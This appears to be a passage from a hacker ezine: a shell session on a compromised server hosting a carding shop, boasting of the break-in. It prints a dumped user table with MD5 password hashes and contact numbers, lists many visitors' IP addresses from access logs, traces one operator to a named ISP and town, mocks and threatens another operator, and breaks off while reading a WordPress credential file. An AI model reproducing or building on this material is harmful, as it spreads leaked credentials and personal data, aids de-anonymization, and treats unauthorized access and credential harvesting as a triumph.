| 9726 | albozz | d41d8cd98f00b204e9800998ecf8427e | | 18 | 0 | |
| 9729 | Spexti | 4dfd9542414fed623b432aee923618d0 | | 6 | 0 | |
| 9791 | Bastler | a278ec2edc9105bd52fe62254522ecd4 | | 20 | 0 | |
| 9820 | vima | f3674879f5e18c7989e02235da302cc9 | | 20 | 0 | |
| 9822 | xNiightx | ef605602b07ae6b27054649d92e28b3e | 474300093 | 19 | 0 | |
| 9824 | bergwerk | c4fd4f3a6e0f9ccbc309a510a7efbad4 | | 12 | 0 | |
| 9948 | funny333 | 56a876cce8c5d91ed47db1b742573d36 | | 17.5 | 0 | |
| 9966 | Friedrich | 28acec923aa820ebbe028955a5a46356 | ja | 7 | 0 | |
| 10035 | Auzodiox | 286119328282d5d64cf1a3a02aba6316 | | 15 | 0 | |
| 10003 | donjuan | 6d11921056f42e148b13a528c82d174e | | 5.5 | 0 | |
| 10005 | hajo22 | 566a1fc42bc3fa17a3920221d2b24d34 | | 6 | 0 | |
| 10032 | golem | 62650cd9a5fb136dc137b155e4ae6f2a | | 15.5 | 0 | |
| 10033 | blood | 42ee64c24d1efcc4c1916074461854f3 | | 10 | 0 | |
| 10051 | Technoboom | 77711870d494d022654bcf842b603467 | | 7 | 0 | |
| 10217 | LiBeRtY1338 | d41d8cd98f00b204e9800998ecf8427e | 634365955 | 9.1 | 0 | |
| 10085 | mo100 | 7cc5a8be611ccce374885048bc2a4848 | | 32.5 | 0 | |
| 10575 | Twix2010 | 75a593a34aa5ba8e5e5788b7c899802e | | 7 | 0 | |
| 10216 | Spagel | 22243bfba05b9715e6303dacf7f66c90 | | 30 | 0 | |
| 10391 | DerHase | e99a18c428cb38d5f260853678922e03 | | 7.5 | 0 | |
| 10290 | samsamsam3 | 03f828f4b26b4ebab502c56a78cc0580 | 600148357 | 70 | 0 | |
| 10304 | dasfrek | de68fbe75420c572d172d456ec9a48b3 | 158204790 | 13 | 0 | |
| 10402 | Kevko | a0017f523db6e51a75f02647a89280bd | 480179 | 9 | 0 | |
| 10440 | ahm123 | 97c45c9bb4cea4d08721d101388578bb | | 7 | 0 | |
| 10555 | homer | f54146a3fc82ab17e5265695b23f646b | | 9 | 0 | |
| 10557 | ccmajor | 1fafd7a63f5980302a5cdaa790988b7b | 158545 | 10 | 0 | |
+--------+---------------+----------------------------------+--------------+---------+--------+---+
169 rows in set (0.01 sec)
mysql> Aborted
# cd /var/log/httpd
# Some recent ip adresses?^C
# grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log
httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341
httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323
httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323
httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323
httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php HTTP/1.0" 8213 652 323
httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323
httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323
httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323
httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323
httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323
httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323
httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323
httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323
httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341
httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323
httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323
httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341
httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323
httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323
httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323
httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323
httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323
httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323
httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323
httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323
httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323
httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323
httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323
httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php HTTP/1.0" 8164 583 323
httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323
httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323
httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323
httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323
httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323
httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323
httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323
httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323
httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323
httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323
httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323
httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323
httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341
httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323
httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341
httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323
httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323
httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323
httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323
httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323
httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323
httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341
httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323
httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341
httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323
httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341
httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323
httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341
httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323
httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341
httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341
httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323
httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323
httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323
httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323
httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323
httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 323
httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323
httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323
httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341
httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323
httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323
httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341
httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341
httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323
httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341
httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323
httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341
httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341
httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323
httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341
httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323
httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323
httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323
httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323
httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 8670 581 323
httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323
httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323
httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323
httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341
httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323
httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323
httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341
httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323
httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341
httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323
httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341
httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323
httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323
httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323
httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323
httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323
httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323
httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341
httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323
httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323
httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323
httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323
httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323
httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341
# And who is the guy behind that crap?^C
# last | grep mmgen
mmgen ftp 212.150.184.230 Mon Oct 3 16:58 - 16:59 (00:01)
mmgen ftp 212.150.184.230 Mon Oct 3 16:57 - 16:58 (00:01)
mmgen ftp 212.150.184.230 Mon Oct 3 16:43 - 16:44 (00:01)
mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:11 (00:01)
mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:13 (00:03)
mmgen ftp 212.150.184.230 Mon Oct 3 16:04 - 16:05 (00:01)
mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 16:00 (00:05)
mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:54 (00:00)
mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:57 (00:03)
# Israel does not look that interesting...^C
# grep mgen.*78 /var/log/proftpd-transfer.log
Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c
Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen ftp 0 * c
Sun Jan 23 16:36:30 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c
Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c
Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c
Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c
Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c
78.42.186.98 resolves to Kabel Baden-Wuerttemberg GmbH & Co. KG,
Muellheim in Germany. Looks like someone did not constantly use a
proxy. Means you are officially
.
/ \
| |
|.| PWNED LOL!
|.| /
|:| __ /
,_|:|_, / )
(Oo / _I_
+\ \ || __|
\ \||___|
\ /.:.\-\
|.:. /-----\
|___|::pwn::|
/ |:<_T_>:|
|_____\ ::: /
| | \ \:/
| | | |
\ / | \___
/ | \_____\
Alright people let's keep the show going with El-Basar.biz ...
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((========{ El-Basar.biz }=======-------
/' ' '()/~' '.(, |
,;( )|| | ~ Searching for "El-Bazar.biz" on google gives a
,;' \ /-(.;, ) good impression of what's being sold there. You
) / ) / can buy one week of DDOS to take down one web-
// || site for 250 Euros. You get 10 US CCs without
)_\ )_\ DOB (date of birth) for 5 Euros. And you can even
buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is being
run by some guy called Ganymedes and was hosted on the same server as
St0re.cc. However it seems like Ganymedes has moved his shop to
another location which sadly has not been backdoored by us so far and
thus will not make it into this issue of our ezine. Notwithstanding he
left enough data on his old box, but we must say, Ganymedes, if you
don't take down your store, we will be so kind and do that for you
sooner or later. Thanks.
# pwd
/home
# ls -la
total 116
drwx--x--x 28 root wheel 1024 Sep 14 17:31 .
drwx--x--x 18 root wheel 512 Apr 12 19:59 ..
drwxrwx--- 13 alg www 1024 Feb 19 2011 alg
drwxr-x--- 4 ayoga www 512 Apr 23 2009 ayoga
drwxr-x--- 5 crank2010 www 512 Dec 27 2009 crank2010
drwxr-x--- 4 exchanger www 512 Mar 31 2010 exchanger
drwxr-x--- 6 filip www 512 Jul 16 2010 filip
drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ganymedes
drwxr-x--- 6 garf www 512 Apr 16 02:26 garf
drwxr-x--- 4 lordknight www 512 Jan 3 2010 lordknight
drwxr-x--- 4 madrage www 512 Jan 10 2010 madrage
drwxrwxr-x 5 margosha www 512 Sep 8 16:22 margosha
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 mmgen
drwxr-x--- 9 mr101 www 512 Apr 7 2010 mr101
drwxr-x--- 4 msk www 512 May 20 2009 msk
drwxr-x--- 4 muraaat www 512 Aug 29 20:59 muraaat
drwxr-x--- 7 nukeuploads www 512 Dec 2 2009 nukeuploads
drwxr-x--- 8 onlineschauen www 512 Oct 1 23:57 onlineschauen
drwxr-x--- 4 pavlrse www 512 Aug 21 03:32 pavlrse
drwxr-x--- 8 propiska www 512 Nov 19 2010 propiska
drwxr-x--- 5 scenehack www 512 Feb 22 2010 scenehack
drwxr-x--- 4 snetwork www 512 Jul 14 22:01 snetwork
drwxr-x--- 5 szenevz www 512 Mar 11 2010 szenevz
drwxr-x--- 2 test4me www 512 Sep 2 01:39 test4me
drwxr-x--- 4 thefuelru www 512 Jan 22 2010 thefuelru
drwxr-x--- 4 useresu www 512 Aug 19 11:27 useresu
drwxr-x--- 4 useresu1 www 3584 Aug 19 11:47 useresu1
drwxrwxr-x 6 vestacomp www 512 Dec 20 2010 vestacomp
# cd ganymedes
# ls -la
total 1180
drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .
drwx--x--x 28 root wheel 1024 Sep 14 17:31 ..
-rw------- 1 root www 520192 Oct 5 21:43 bash.core
drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 el-basar.biz
drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 newsportal24.net
drwxrwx--- 2 ganymedes www 53760 Oct 6 00:38 temp
# cd newsportal24.net
# ls -la
total 388
drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 .
drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ..
-rw-r--r-- 1 ganymedes www 397 Sep 27 18:24 index.php
-rw-r--r-- 1 ganymedes www 16572 Sep 27 18:24 license.txt
drwxr-xr-x 2 ganymedes www 512 Sep 29 00:50 test
-rw-r--r-- 1 ganymedes www 4343 Sep 27 18:24 wp-activate.php
drwxr-xr-x 9 ganymedes www 2560 Sep 27 18:25 wp-admin
-rw-r--r-- 1 ganymedes www 40243 Sep 27 18:24 wp-app.php
-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-atom.php
-rw-r--r-- 1 ganymedes www 274 Sep 27 18:24 wp-blog-header.php
-rw-r--r-- 1 ganymedes www 3931 Sep 27 18:24 wp-comments-post.php
-rw-r--r-- 1 ganymedes www 244 Sep 27 18:24 wp-commentsrss2.php
-rw-r--r-- 1 ganymedes www 3577 Sep 27 18:24 wp-config-sample.php
-rw-rw-rw- 1 www www 3896 Sep 27 18:33 wp-config.php
drwxr-xr-x 6 ganymedes www 512 Sep 27 18:40 wp-content
-rw-r--r-- 1 ganymedes www 1255 Sep 27 18:24 wp-cron.php
-rw-r--r-- 1 ganymedes www 246 Sep 27 18:24 wp-feed.php
drwxr-xr-x 8 ganymedes www 2560 Sep 27 18:26 wp-includes
-rw-r--r-- 1 ganymedes www 1997 Sep 27 18:24 wp-links-opml.php
-rw-r--r-- 1 ganymedes www 2618 Sep 27 18:24 wp-load.php
-rw-r--r-- 1 ganymedes www 27601 Sep 27 18:24 wp-login.php
-rw-r--r-- 1 ganymedes www 7774 Sep 27 18:24 wp-mail.php
-rw-r--r-- 1 ganymedes www 494 Sep 27 18:24 wp-pass.php
-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rdf.php
-rw-r--r-- 1 ganymedes www 334 Sep 27 18:24 wp-register.php
-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rss.php
-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-rss2.php
-rw-r--r-- 1 ganymedes www 9839 Sep 27 18:24 wp-settings.php
-rw-r--r-- 1 ganymedes www 18646 Sep 27 18:24 wp-signup.php
-rw-r--r-- 1 ganymedes www 3702 Sep 27 18:24 wp-trackback.php
-rw-r--r-- 1 ganymedes www 3266 Sep 27 18:24 xmlrpc.php
# cat wp-config.php
<?php
/**
* In dieser Datei werden die Grundeinstellungen für WordPress vorgenommen.
*
